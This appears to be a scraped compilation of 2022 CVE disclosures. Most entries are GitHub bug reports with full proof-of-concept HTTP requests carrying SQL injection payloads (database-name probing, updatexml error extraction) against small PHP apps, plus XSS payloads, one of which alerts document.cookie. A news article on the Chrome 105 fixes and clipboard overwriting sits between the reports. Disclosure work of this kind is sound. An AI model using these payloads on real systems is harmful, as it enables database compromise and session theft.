Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/view_schedule.php.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/schedules/view\_schedule.php

Vulnerability location: /tss/admin/schedules/view\_schedule.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/schedules/view\_schedule.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/schedules/view\_schedule.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36674: bug_report/SQLi-3.md at main · Nujabe4/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/manage_schedule.php.

Permalink

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/schedules/manage\_schedule.php

Vulnerability location: /tss/admin/schedules/manage\_schedule.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/schedules/manage\_schedule.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/schedules/manage\_schedule.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36675: bug_report/SQLi-2.md at main · Nujabe4/bug_report

But one issue that lets websites overwrite content on a user's system clipboard appears unfixed in the new Version 105 of Chrome.

Google's first stable channel version of Chrome 105 for Windows, Mac, and Linux, released this week, contained fixes for 24 vulnerabilities in previous versions of the software, including one "critical" flaw and eight that the company rated as being of "high" severity.

A plurality — nine — of the security issues that Google addressed with Chrome 105 were so-called use-after-free vulnerabilities, or flaws that allow attackers to use previously freed memory spaces to execute malicious code, corrupt data, and take other malicious actions. Four of the patched vulnerabilities were heap buffer-overflows in various Chrome components, including WebUI and Screen Capture.

Attackers often exploit buffer overflows for a variety of malicious purposes, including executing random code, overwriting data, crashing systems, and triggering denial-of-service conditions.

**Clipboard Overwriting**

One issue that Google does not appear to have fixed in the update centers around clipboards. According to Malwarebytes, when users of Google Chrome — or any Chromium-based browser — visit a website, the site can push any content they want to the user's OS clipboard, without the user's permission or any interaction.

"This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge," Malwarebytes said.

This can result in users losing valuable data they might have wanted to cut and paste elsewhere while also giving attackers an opening to try and sneak malicious code on a user's system, the security vendor said. The problem has to do with the absence of any requirement in Chrome and Chromium-based browser for users to take specific steps such as using "Ctrl+C" to copy content from a website to the user's clipboard, Malwarebytes said.

Security researcher Jeff Johnson identified the issue with Chrome as part of a broader problem that impacts both Safari and Firefox as well. "Chrome is currently the worst offender, because the user gesture requirement for writing to the clipboard was accidentally broken in version 104," he said in a report this week.

However, the reality is that users of other browsers such as Firefox and Safari can have websites overwriting their system clipboards more easily than they realize, Johnson said. Though both these browsers require users to take some action to copy website content to their clipboards, the actions are a lot broader than they might imagine.

For instance, actions like focusing out on a screen, or pressing keydown/ keyup and mousedown/ mouseup, can result in website content getting copied to the clipboard without the user's knowledge, Johnson said.

The researcher noted that Chrome developers are already aware of the issue and are addressing it. Google did not immediately response to a Dark Reading request for comment.

"Attackers may abuse this bug to copy malicious links to users' clipboards, which could result in users pasting those links in their address bar and accessing malicious sites accidentally," says Ivan Righi, senior cyber threat analyst at Digital Shadows.

"Another way this bug could be exploited is to conduct fraudulent cryptocurrency transactions. Threat actors could leverage the flaw in conjunction with social engineering attacks to get users to enter the wrong wallet addresses for transactions," Righi says. However, the likelihood of such attacks being successful is low because users are likely going to notice abnormal contents placed on their clipboard, he says.

**A Plethora of Use-After-Free Issues**

Meanwhile, the sole critical vulnerability (CVE-2022-3038) Google addressed with the stable version of Chrome 105 was reported by a security researcher from its own Project Zero bug hunting team: The use-after-free flaw in Google Chrome Network Service gives remote attackers a way to execute arbitrary code or trigger denial of service conditions on user systems by getting them to visit a weaponized website.

External bug hunters and security researchers reported all the remaining vulnerabilities that Google addressed this week in Chrome. The most consequential among them appears to have been CVE-2022-3039, a high-severity, user-after-free vulnerability in WebSQL that two researchers from China's 360 Vulnerability Research Institute reported to Google. The researchers received $10,000 for reporting the bug to Google — the highest amount awarded in the current set.

Another high-impact, use-after-free flaw in Chrome Layout garnered $9,000 for the anonymous security researcher that reported the issue to Google. Bounties for the remaining bugs ranged from $1,000 to $7,500. Google has not yet determined rewards for four bug disclosures.

As has become standard practice among major vendors, Google said it has restricted access to bug details until most users have an opportunity to implement the new, stable version of Chrome.

"We will also retain restrictions if the bug exists in a third-party library that other projects similarly depend on but haven’t yet fixed," Google said in a blog this week. A senior Microsoft security executive had recently used the same reason to explain why Microsoft's bug disclosures also contain scant details these days.

While the bug fixes are almost certainly the primary reason why users might want to update to the stable version of Chrome 105, the new browser version also introduces a handful of additional features. These include features that allow developers to add windows controls button — such as closing, maximizing, or minimizing — to progressive Web apps, a new picture-in-picture API for Chrome on Android, and improvements to Chrome's Navigation API.

Google Fixes 24 Vulnerabilities With New Chrome Update

Piwigo 12.3.0 is vulnerable to Cross Site Scripting (XSS) via /search/1940/created-monthly-list.

The value of the /search/1940/created-monthly-list request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick a user to visit some crafted URL that is connected exactly to this system. Then he can trick the user to visit some malicious address that the victim will think is connected with the original web address it depending on the scenario. This can be dangerous for all users of this system.

GET /piwigo/index.php?/search/4863/created\-monthly\-list%22%3Ehttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcom%3CYZxWX%3E HTTP/1.1
Host: pwned\_host.com
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: en\-US,en;q\=0.5
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: pwg\_id\=hctfqtab45adhogo2suhq2mr0c; ssc\_phoneSwap\=0
Upgrade\-Insecure\-Requests: 1

CVE-2022-37183: CVE-nu11secur1ty/vendors/Piwigo/2022/12.3.0 at main · nu11secur1ty/CVE-nu11secur1ty

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the RollNo parameter at /admin/delstu.php.

Permalink

Cannot retrieve contributors at this time

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/admin/delstu.php

Vulnerability location: /LMS/admin/delstu.php, RollNo

\[+\] Payload: delete=&RollNo=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--%20 // Leak place ---> RollNo

POST /LMS/admin/delstu.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
delete=&RollNo=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--%20

CVE-2022-36734: bug_report/SQLi-24.md at main · k0xx11/bug_report

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the M_Id parameter at /admin/del.php.

Permalink

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/admin/del.php

Vulnerability location: /LMS/admin/del.php, M\_Id

\[+\] Payload: delete=&M\_Id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--%20 // Leak place ---> M\_Id

POST /LMS/admin/del.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
delete=&M\_Id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--%20

CVE-2022-36733: bug_report/SQLi-22.md at main · k0xx11/bug_report

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the bookId parameter at /admin/delete.php.

Permalink

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/admin/delete.php

Vulnerability location: /LMS/admin/delete.php, bookId

\[+\] Payload: delete=&bookId=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--%20 // Leak place ---> bookId

POST /LMS/admin/delete.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
delete=&bookId=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--%20

CVE-2022-36735: bug_report/SQLi-23.md at main · k0xx11/bug_report

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /librarian/dele.php.

Permalink

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/librarian/dele.php

Vulnerability location: /LMS/librarian/dele.php, id

\[+\] Payload: delete=&id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /LMS/librarian/dele.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
delete=&id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36732: bug_report/SQLi-19.md at main · k0xx11/bug_report

Library Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /librarian/edit_book_details.php.

Permalink

Cannot retrieve contributors at this time

**Library Management System v1.0 by kingbhob02 has Stored Cross-Site Scripting****BUG\_Author: z1pwn****Date: 07.22.2022**

Login account: admin/admin (Super Admin account)

**Software:**

https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

#Description： #The Line 278 of edit\_book\_details.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.

#echo $edit\_book\_details->Author;

#PoC：

POST /LMS/librarian/edit\_book\_details.php?id\=192 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/LMS/librarian/edit\_book\_details.php?id=192
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
Section=Filipiniana&Subject=1&book=1&Copyright=1&Title=1&availability=1&Author=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&ISBN=1&status=DAMAGE&submit=

CVE-2022-36657: bug_report/XSS-1.md at main · z1pwn/bug_report

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the RollNo parameter at /librarian/delstu.php.

Permalink

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/librarian/delstu.php

Vulnerability location: /LMS/librarian/delstu.php, RollNo

\[+\] Payload: delete=&RollNo=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--%20 // Leak place ---> RollNo

POST /LMS/librarian/delstu.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
delete=&RollNo=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--%20

Tag

#firefox